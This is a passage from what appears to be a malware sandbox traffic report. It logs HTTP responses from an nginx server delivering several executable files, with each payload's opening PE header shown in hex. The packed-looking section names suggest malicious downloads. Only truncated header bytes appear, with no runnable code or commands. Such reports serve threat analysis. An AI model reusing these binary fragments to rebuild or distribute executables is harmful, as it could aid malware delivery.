00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 90 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:03 GMTContent-Type: application/octet-streamContent-Length: 6483456Last-Modified: Sat, 01 Feb 2025 14:52:32 GMTConnection: keep-aliveETag: "679e3530-62ee00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 52 54 9b 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 d0 47 00 00 c6 69 00 00 32 00 00 00 60 a1 00 00 10 00 00 00 e0 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 a1 00 00 04 00 00 a6 75 63 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 10 67 00 73 00 00 00 00 00 67 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 c8 69 00 88 06 00 00 bc 45 a1 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 45 a1 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 f0 66 00 00 10 00 00 00 8c 28 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 00 67 00 00 02 00 00 00 9c 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 10 67 00 00 02 00 00 00 9e 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 73 74 61 64 7a 73 6e 6d 00 30 3a 00 00 20 67 00 00 28 3a 00 00 a0 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 74 73 6d 6a 72 62 6b 69 00 10 00 00 00 50 a1 00 00 04 00 00 
00 c8 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 a1 00 00 22 00 00 00 cc 62 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:12 GMTContent-Type: application/octet-streamContent-Length: 961024Last-Modified: Sat, 01 Feb 2025 15:06:42 GMTConnection: keep-aliveETag: "679e3882-eaa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 6d 38 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 fa 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 00 0f 00 00 04 00 00 7a f8 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 3e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 
00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 3e 01 00 00 40 0d 00 00 40 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 80 0e 00 00 76 00 00 00 34 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:24 GMTContent-Type: application/octet-streamContent-Length: 1867264Last-Modified: Sat, 01 Feb 2025 15:38:01 GMTConnection: keep-aliveETag: "679e3fd9-1c7e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 d0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4a 00 00 04 00 00 d0 0d 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 7a 71 6a 65 73 6e 6d 73 00 c0 19 00 00 00 30 00 00 b2 19 00 00 a6 02 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 e0 69 74 63 69 62 6f 66 70 00 10 00 00 00 c0 49 00 00 04 00 00 00 58 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 49 00 00 22 00 00 00 5c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:25 GMTContent-Type: application/octet-streamContent-Length: 2915840Last-Modified: Sat, 01 Feb 2025 15:07:28 GMTConnection: keep-aliveETag: "679e38b0-2c7e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 0a 00 00 00 00 00 00 00 e0 2c 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 2d 00 00 04 00 00 e1 f8 2c 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 68 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 68 06 00 00 00 60 00 00 00 04 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 36 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 6c 68 77 79 75 6d 75 79 00 20 2c 00 00 a0 00 00 00 20 2c 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 64 68 66 75 77 64 65 00 20 00 00 00 c0 2c 00 00 04 00 00 
00 58 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 e0 2c 00 00 22 00 00 00 5c 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:28 GMTContent-Type: application/octet-streamContent-Length: 1925120Last-Modified: Sat, 01 Feb 2025 15:09:05 GMTConnection: keep-aliveETag: "679e3911-1d6000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 12 25 9e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 66 04 00 00 ac 00 00 00 00 00 00 00 d0 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 4c 00 00 04 00 00 f3 af 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 90 05 00 6b 00 00 00 00 80 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 91 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 70 05 00 00 10 00 00 00 8a 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 80 05 00 00 02 00 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 90 05 00 00 02 00 00 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 80 2b 00 00 a0 05 00 00 02 00 00 00 9e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6f 70 64 6f 74 77 79 00 a0 1a 00 00 20 31 00 00 98 1a 00 00 a0 02 00 00 00 00 00 
00 00 00 00 00 00 00 00 40 00 00 e0 77 6f 7a 66 75 75 71 6b 00 10 00 00 00 c0 4b 00 00 06 00 00 00 38 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 4b 00 00 22 00 00 00 3e 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:35 GMTContent-Type: application/octet-streamContent-Length: 1808896Last-Modified: Sat, 01 Feb 2025 15:09:15 GMTConnection: keep-aliveETag: "679e391b-1b9a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 cb bd 98 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 69 00 00 04 00 00 aa c4 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 8c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 8c 03 00 00 00 a0 24 00 00 04 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 
40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 c0 24 00 00 02 00 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 7a 69 70 6a 68 72 61 00 00 1a 00 00 60 4f 00 00 f4 19 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 69 77 6f 72 65 69 74 71 00 10 00 00 00 60 69 00 00 04 00 00 00 74 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 69 00 00 22 00 00 00 78 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 15:53:40 GMTContent-Type: application/octet-streamContent-Length: 970752Last-Modified: Sat, 01 Feb 2025 15:06:49 GMTConnection: keep-aliveETag: "679e3889-ed000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5f 38 9e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 0b 21 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 20 65 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 
